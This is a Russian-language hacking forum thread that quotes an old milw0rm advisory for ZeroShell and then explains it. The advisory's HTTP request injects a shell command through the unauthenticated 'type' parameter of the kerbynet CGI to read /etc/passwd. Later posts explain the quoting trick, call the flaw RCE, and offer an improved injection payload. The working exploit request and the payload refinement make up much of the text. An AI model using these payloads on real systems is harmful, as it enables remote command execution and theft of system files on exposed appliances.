Code:
================================================== ==
ZeroShell ;%22

In addition to the Unix commands, it is possible to abuse the
ZeroShell scripts themself. For instance it is likely to use the
"getkey" script in order to retrieve remote files, including the content
in the html page.

{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host:
# milw0rm.com [2009-02-09]

Заинтересовало, но не могу одуплить.

Bezlishke said:
↑ (https://antichat.live/posts/3966780/)

Code:
================================================== ==
ZeroShell ;%22

In addition to the Unix commands, it is possible to abuse the
ZeroShell scripts themself. For instance it is likely to use the
"getkey" script in order to retrieve remote files, including the content
in the html page.

{HTTP REQUEST}
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host:
# milw0rm.com [2009-02-09]

Заинтересовало, но не могу одуплить.


староватая конечно бага)

поле type участвует судя по всему в какой то баш команде, то есть

$ blablabla "blabla $type"

из за плохой фильтрации можно сделать инъекцию вида ";наша команда

%22 это как раз знак "

пайлоад у них правда странный *%22;;%22

имхо лучше так *%22;cmd;%23

t0ma5 said:
↑ (https://antichat.live/posts/3966784/)
староватая конечно бага)
поле type участвует судя по всему в какой то баш команде, то есть
$ blablabla "blabla $type"
из за плохой фильтрации можно сделать инъекцию вида ";наша команда
%22 это как раз знак "
пайлоад у них правда странный *%22;;%22
имхо лучше так *%22;cmd;%23


Команд ИНЖ. хотя не, РЦЕ. Суть вопроса не понятна только

BabaDook said:
↑ (https://antichat.live/posts/3966807/)
Команд ИНЖ. хотя не, РЦЕ. Суть вопроса не понятна только


так это не вопрос, а ответ был) чел выше спрашивал что эта такое